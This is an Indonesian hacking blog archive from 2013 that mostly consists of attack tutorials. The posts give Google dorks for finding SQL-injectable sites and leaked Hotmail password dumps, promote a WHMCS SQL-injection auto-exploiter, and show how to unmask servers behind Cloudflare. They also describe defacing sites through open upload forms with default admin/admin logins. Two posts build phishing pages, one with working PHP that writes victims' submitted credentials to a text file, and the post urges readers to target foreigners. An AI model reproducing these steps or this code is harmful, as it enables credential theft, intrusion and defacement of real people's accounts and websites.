Showing posts with label Hacking. Show all posts
Showing posts with label Hacking. Show all posts

Sunday, 15 December 2013

Published December 15, 2013 by with 0 comment

Analyse Website dengan SQLSentinel


Mungkin kalian tidak pernah mempopularkan tools ini . Sebenarnya tools ini layaknya serupa dengan acunetix atau web cruizer akan tetapi ini versi simplenya . SQL sentinel berguna untuk pengecekan data url yang tersedia di website . Langsung saja simak thread posting yang saya buat sendiri :
  • Download dulu dan instal aplikasi Javanya di homepage resminya di  sini --
  • Dan Download SQLSentinel di situs download resminya disini --
  • Kita dapat melihat dari url celah sql sampai url halaman admin seperti di gambar dibawah ini :
Waktu Scanning --

Hasil singkat scanning

Sekian postingan singkat dari saya. Dan saya sarankan untuk jangan asal merusak website tapi pelajarilah sedalamnya bukan jadi perusak ,karena perusak teman setan :D . Salam ...



Read More

Tuesday, 26 November 2013

Published November 26, 2013 by with 0 comment

Best Google Dorks Untuk Cari India Site SQLI Vuln

10 dork terkenal untuk mencari web india yang vuln dengan sqli websites.Langsung saja :
Screanshot:



1#
 inurl:.co.in & inurl:.php?id=

2#
 intext:india & inurl:.php?id=

3#
 inurl:index.php?id= & inurl:.co.in

4#
 inurl:.co.in & inurl:article.php?ID=

5#
 inurl:.co.in & inurl:Pageid=

6#
 inurl:.co.in & inurl:staff_id=

7#
 inurl:.gov.in & inurl:.php?id= (this for gov sites)

8#
 inurl:.co.in & inurl:newsitem.php?num=

9#
 inurl:.nic.in & inurl:.php?id= (this for NiC domains)

10#
 inurl:india & inurl:.php?id=

Selamat mencoba..
Read More

Tuesday, 19 November 2013

Published November 19, 2013 by with 0 comment

Gmail Easy Verification Bypass

Pertama dapatkan nomor spanyol gratisnya disini :

Dan sesuaikan tipe vertifikasi kedalam nomor spanyol 

Screanshot :


Lalu akan mendapatkan code vertifikasi dari IIeida 


 Dan masukan code vertifikasinya ,lalu gmail anda sudah dalam tervertifikasi secara cepat dan akurat . Semoga bermanfaat,
Read More

Saturday, 16 November 2013

Published November 16, 2013 by with 0 comment

Mail ID Hacking Dengan Goolge Dorks

Saya akan membagikan beberapa dork guys ! dengan dork ini insyallah akan menembus id dan password dari database google .Jadi mari kita mulai sekarang :

Dorks Basic(umum) :



  • ext:sql intext:@hotmail.com intext:e10adc3949ba59abbe56e057f20f883e
  • ext:sql intext:"INSERT INTO" intext:@hotmail.com intext:password
  • ext:sql intext:@hotmail.com intext:password
Masukan dork ke google
Screanshot:


Lalu pilih salah satu link / site, maka akan tampak seperti ini.
Screanshot:


Password bisa jadi dalam bentuk md5 atau password asli . Tergantung tampilan ganteng kalian :D . Semoga Bermanfaat ,dan terima kasih
Read More
Published November 16, 2013 by with 1 comment

WHMCS 0Day Auto Exploiter PHP Code 5.2.8


Hari ini saya hadir Anda senjata paling mematikan untuk massa penghancuran. Alat ini menargetkan WHMCS melalui kerentanan SQL injection yang disebabkan karena Daftar global yang digunakan oleh programmer bodoh mereka.

Seperti biasa, Anda hanya perlu memberikan Dorks, ambil jagung pop, duduk dan menonton diri pwning shi besar! T.T Ribuan perusahaan web hosting rentan terhadap eksploitasi ini. Dengan 10 Dorks, saya bisa mengumpulkan login WHMCS . Itu berarti ribuan akar kerentanan.Langsung saja kalian simak baik-baik:

Dork :
inurl:submitticket.php site:.com or inurl:submitticket.php site:.net
inurl:submitticket.php site:.us
inurl:submitticket.php site:.eu
inurl:submitticket.php site:.org
inurl:submitticket.php site:.uk
intext:"Powered by WHMCompleteSolution"
intext:"Powered by WHMCompleteSolution" inurl:clientarea.php
inurl:announcements.php intext:"WHMCompleteSolution"
intext:"Powered by WHMCS"
Kreasikan dork menurut kreatifitas kalian *

Source Code :
http://pastebin.com/Dfce5W5v


  • Hanya men-copy pastekan kenotepad dan menamainya dengan ex.(PHP)
  • Upload Exploit tersebut kedalam hosting atau bisa di akses melalui WAMPP atau XAMPP .
Screanshot :

Semoga bermanfaat ! Salam ...


Read More

Thursday, 31 October 2013

Published October 31, 2013 by with 0 comment

Analisis Vuln Web dengan Vega Scanner


Tools yang cukup efisien dan ringan untuk menganalisa terjadinya kesalahan error atau bugs/vuln pada suatu situs web. Ini juga bisa sebagai pengganti dari tools acunetix . Langsung saja simak baik baik : 

Download Aplikasi Java untuk PC anda (wajib) : Link download resminya disini

Dan tentunya Vega Scannernya : Link download resminya disini

  • cara install : 

  1. download dan install tools vega scanner sesuai bit OS PC anda 
  2. install sampai selesai, apabila muncul reason patch javaw.exe maka buka windows explorer,- 
  3. klik program files, klik vega, lalu buat sub folder jre,- 
  4. klik jre, lalu buat sub sub folder bin dan terakhir copy pastekan javaw.exe tersebut

Semoga bermanfaat untuk menganalisa web . Assalamualaikum ..
Read More

Friday, 27 September 2013

Published September 27, 2013 by with 0 comment

Bypassing Cloudfare Untuk Mendapat IP Real

Banyak forum atau situs besar yang menggunakan jasa cloudfire karena mereka percaya bahwa memiliki perlindungan terhadap serangan seperti halnya DDOS . Saya akan menunjukkan kepada kalian sebuah metodhe yang sangat mudah untuk memotong Cloudflare untuk melihat REAL(Asli) forum IP. Untuk contoh ini saya akan menggunakan situs Hacker terbesar di Indonesia yaitu Hack*r - Newbi* . org . Kita langsung saja bypassing IP asli dari cloudfire :

1. Pertama buka link IP Logger di bawah ini :
2. Lalu copy link gambar pada kotak ketiga seperti gambar dibawah ini :

3. Langkah selanjutnya cari situs/forum target kemudian login sebagai pengguna dan setting profile untuk mengubah avatar (photo profile) 

 4. Pergantian avatar telah selesai, secara otomatis web server melakukan Ping terhadap url image tadi sehingga IP address web server tersebut terekam ke dalam file log. Jika terjadi semacam error abaikan saja !

 5. Tahap terakhir tinggal melihat hasil dari penanaman link image tersebut . Buka link IPLogger tadi lalu klik "View Log" untuk melihat Real IPnya


Cara ini hanya merupakan gambaran singkat, tingkat keberhasilannya tergantung dari system keamanan dan configurasi yang ada pada server tersebut, untuk melihat data site yang menggunakan cloudfire bisa di lihat di http://www.cloudflare-watch.org/ . Jadi tidak semua IP address yg disembunyikan melalui fitur Cloudflare bisa di bypass dengan mudah.Sekian dari saya, Wasallamu'alaikum Wr. Wb.
Read More

Friday, 20 September 2013

Published September 20, 2013 by with 0 comment

Test IQ Anti Phising diSonic Wall

Kali ini saya akan memberikan solusi buat kalian semua yang ingin menguji tingkat kehati-hatiannya terhadap phising. Langsung saja kalian kunjungi link dibawah ini :

Click here to view now !

Untuk lebih jelas bisa lihat gambar di bawah ini pada saat test:






Disitu terdapat 3 pilihan jawaban

  • No Answer = Tidak Menjawab
  • Legitimate = Bukan Phising ( Sah )
  • Dan Phising = Benar Jebakan Phising
Kelebihannya antara lain :
  • Tidak ada batasan waktu
  • Disertai alasan mengapa hal itu bisa benar atau salah
  • Mendapatkan score pastinya :)
Gambar di bawah ini merupakan contoh hasil test kemarin dari saya. :)


 Semoga saja membantu kalian semua untuk semakin waspada terhadap serangan phising . Salam ...

 

Read More
Published September 20, 2013 by with 41 comments

Cara Membuat Script Web Phising

Phising, yang berasal dari kata fishing yang diartikan dalam bahasa indonesia artinya memancing. Benar ! teknik metodhe ini tidak asing lagi bagi para hacker yang ingin mengetahui identitas korbannya. Akan tetapi phising ini juga bisa disediakan dalam bentuk website yang sebagai manipulasi ( fake ) . Bagaimana cara membuat page scriptnya ? Langsung saja kalian simak cara membuat page phising berbasis web sebagai berikut :

1. Pertama kunjungi dan lihat source code situs yang ingin dibuat jebakan phising (Ex : facebook, paypal, yahoo, etc ) lalu lihat source codenya (Ctrl + U ) atau klik kanan mouse lalu pilih view source itu pun kalau mozilla & Chrome, Entah apa kalau memakai browser yang lain :) . Lihat Gambar dibawah untuk lebih jelasnya :

2. Lalu copy dan pastekan di notepad, kemudian Save file tersebut dengan nama " index.htm atau index.html " .

3. Selanjutnya kita mengedit bagian source dengan langkah - langkah :
  • Cari code " action= " (Ctrl + F untuk mencari ) lalu hapus alamat asli facebook dan ganti dengan " /login.php " ( Untuk direct ) . 
  • Dan ganti metodhenya dari " post " menjadi "get " .Lihat Gambar dibawah ini !
 4. Sesudah itu, buat page headernya (" login.php ") untuk direct akses page web. Buka notepad kalian lalu isikan dengan code dibawah ini lalu save dengan nama " login.php " :


 <?php
header("Location: http://www.google.com");
$handle = fopen("passes.txt", "a");
foreach($_GET as $variable => $value)
{
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>


Seperti gambar dibawah ini :

Keterangan :
  • http://www.google.com alamat yang akan muncul ketika sesi login selanjutnya. Bisa diedit misalnya : http://facebook.com, yahoo.com, dll
  • passes.txt , untuk melihat password dengan melalui url . Ex : http://domainkalian.com/passes.txt
5 . Selanjutnya kalian bisa ujicoba web phising tersebut dengan menguploadkannya di hosting kalian!

Semoga bermanfaat bagi kalian. Ingat ! ini hanya untuk pembelajaran bukan untuk kejahatan, kalau misalkan mau akun facebook ,rentaslah milik orang luar negeri (kecuali bangsa muslim) dari pada dalam negeri karena itu menghancurkan bangsa sendiri dan agama melalui hacking. Wasalamu'alaikum Wr. Wb .

Read More

Thursday, 12 September 2013

Published September 12, 2013 by with 1 comment

Hack Facebook Mudah Orang Lain Dengan Phising

Kali ini saya akan memberikan tutorial cara hack facebook orang lain dengan metodhe phising . Apa itu phising ? Bisa kalian lihat penjelasannya dan pengertian phising di artikel blog yang berjudul Pengertian Phising atau Fake . Langsung saja kalian simak baik baik .

Perlengkapan yang di butuhkan !

  • Hosting gratis
  • Domain atau nama site ( tidak juga tidak apa - apa sunnah kok maz mbak.. )
  • Script Phising ( Untuk Home Page ) bisa didownload disini
  • Oiya bubur kacang ijo + Es Marimas, kalau bingung baca tinggal sruput minum saja dahh .. :) 
Pertama kalian harus membutuhkan hosting untuk memasang sebuah script yang digunakan untuk menjebak. Saya haruskan kalian memakai hosting gratis yg bisa kalian cari di google. Tapi kali ini saya memakai hosting yang lagi tenar yaitu idhostinger. Lihat Site Idhostinger!

  1. Silahkan daftar terlebih dahulu disitus resmi hosting gratis yang kalian gunakan memakai email dan jangan lupa confirmasikan ( setujui ) lewat email kalian juga . Lalu login sebagai user ( pengguna ). 
  2. Buat web hosting pertama kalian dan isi sesuai gambar di bawah ini !
  • Jika tidak mempunyai alamat website (domain) . bisa pakai yang gratis/free yaitu subdomain .

3. kalau sudah masuk ke control panel hosting lalu pergi ke file manajer 3

4. Lalu masuk ke public_html lalu kita cari tombol upload!

5. Lalu masukan filenya dalam bentuk RaR atau yang sebelahnya files juga boleh :)lalu lalu klik centang

6.Lalu lihat hasilnya,sekilas webiste kalian akan tampak seperti facebook asli . Dan itu digunakan untuk menipu korban . Untuk mengecek password dan usernamenya , lihat di http://alamatkalian/pass.txt Contoh punya saya : http://contohphising.tk ->lihat informasinya ke http://contohphising.tk/pass.txt

Ini gambarnya untuk memperjelaskan


artikel lainnya yang terkait di sini yaitu Cara Membuat Page Script Phising Sendiri
Mohon maaf kalau tutorial ini kurang lengkap, mohon dimaklumi karena admin lagi sibuk :D . Salam

Read More

Saturday, 10 August 2013

Published August 10, 2013 by with 0 comment

[Deface]Simple Upload File Shop737

Hallo sahabatku semua yang berbahagia ! Kali ini saya akan membagikan sedikit trik deface, walaupun ini deface ringan tapi suatu saat saya akan posting langsung ke indexnya :) . Oke ! tanpa panjang lebar langsung saja simak baik-baik :

1. Cari target yang di cari dengan dork dibawah ini, lalu masukan di dalam google
  • Dork : inurl:/fluidgalleries/photos/ 
*Dork bisa juga bisa di kembangkan sendiri ..

2. Lalu pilih website yang ingin dijadikan target !


  • Setelah memilih suatu target, kemudian masukan exploitnya ke target tersebut !
  • Exploit : " /upload.php "  
Contoh :
  • http://target.com/poto/index.php?imgdir=Workshop%20RSUD%20Salatiga , menjadi -> http://target.com/poto/upload.php 
*Catatan : Bila di suruh memasukan username password  maka kalian isikan dengan :
  • Username : admin
  • Password : admin 
Bila tidak berhasil maka silahkan cari target yang lain :P .Ingat ! dunia hacking tidak ada yang mudah


3. Oke ! kalau sudah sukes maka akan tampak tampilan seperti di bawah ini !


Step by step to upload *
- Pilih kategori yang di inginkan ! kalau ingin membuat kategori ya monggo-monggo saja :D hehehe..
- Lalu upload file text (*.txt) atau gambar yang di inginkan (tidak support dengan *.php / *.html)
- Lalu tinggal pencet tombol upload.


4. Jika sudah keluar tulisan succes, buka hasil uploadan kalian di :
  • http://target.com/poto/[Kategori]/fileupload -> http://asdijateng.org/poto/tuban/Untitled.jpg 
Contoh hasil yang sudah jadi !
 Sekian tutorial simple deface dari saya . Mohon maaf kalau saya belum bisa memberikan tutorial deface langsung index karena saya hanyalah manusia biasa :D . Semoga bermanfaat bagi kalian semua, sekian dan terimakasih !

Read More

Thursday, 8 August 2013

Published August 08, 2013 by with 0 comment

Sign Up Email @Hacker dot Ps

Hallo bro.! Pada postingan sebelumnya saya berbagi tentang daftar email berdomain @fbi(dot)al .Lah.. kali ini saya akan sharing tutorial sama akan tetapi berbeda domain :D . Yaitu cara daftar email berdomain @Hacker(dot)ps .Langsung saja simak baik - baik . :

Pertama : buka link pendaftarannya disini atau kalian copy paste terus di simpan juga tidak apa apa . .

Kedua kalian tinggal daftar sesuai keininginan. .

Semoga bermanfaat bagi kalian semua ...
Read More

Wednesday, 7 August 2013

Published August 07, 2013 by with 0 comment

Sign Up Email FBI dot AL

Hello ! Kali ini saya akan sharing tentang bagaimana cara mendapatkan email @fbi.al secara gratis. Karena saya mendapatkannya berasal dari forum Hacker luar negeri. Tanpa panjang lebar langsung saja simak sebagai berikut :

1. Pertama jangan lupa sedia koneksi internet dan browser tentunya . Hehehehehe . . . :D . Kemudian copy paste alamatnya disini

2. Kedua tinggal isi sesuai identitas semau selera kalian .Lalu klik '' I accept ''

3.Kelima upss, Ketiga bersombong rialah , akan tetapi dalam islam dilarang bersombong. So, jangan   di sombongin kalau kalian punya email beginian :D

Semoga bermanfaat bagi kalian semua...
Read More

Tuesday, 28 May 2013

Published May 28, 2013 by with 0 comment

[Deface] Simple with FileChucker


defacementfillechucker

Kali ini saya akan share tutorial deface dengan teknik upload file. Teknik ini tergolong mudah dan masih banyak target yang vuln dengan cara atau teknik ini sehingga kita bisa memilih target sepuasnya dan sesuka hati.Langsung saja simak dan perhatikan tutorial dari saya :










  1. Pertama masukan dork yang rentan terhadap Fillechucker tersebut ke Google

defacement

Dork :   inurl:/cgi-bin/filechucker.cgi

2. Setelah itu pilih target sesuka kalian.Maka akan muncul  penampakan form dan upload file.

form sites

3. Upload file .html (tidak cocok untuk file .php) kalian setelah mengisi seluruh form yang terdapat di form situs tersebut

Notice / Catatan :

  • Beberapa web memerlukan data seperti e-mail sebelum meng-upload . Isi saja data-data tersebut namun jangan diisi dengan e-mail asli atau isikan dengan email palsu (fake email)
  • Tempat hasil deface sobat tidak selalu berada di direktori files/uploaded . Bisa saja di http://[situstarget]/upload/files/ atau http://[situstarget]/upload/userfiles/ . Tergantung direktori folder website tersebut dan dimana sobat menyimpannya.
Sekian tutorial [Deface] Simple with FileChucker dari saya, semoga saja bisa bermanfaat bagi kalian semua.

Read More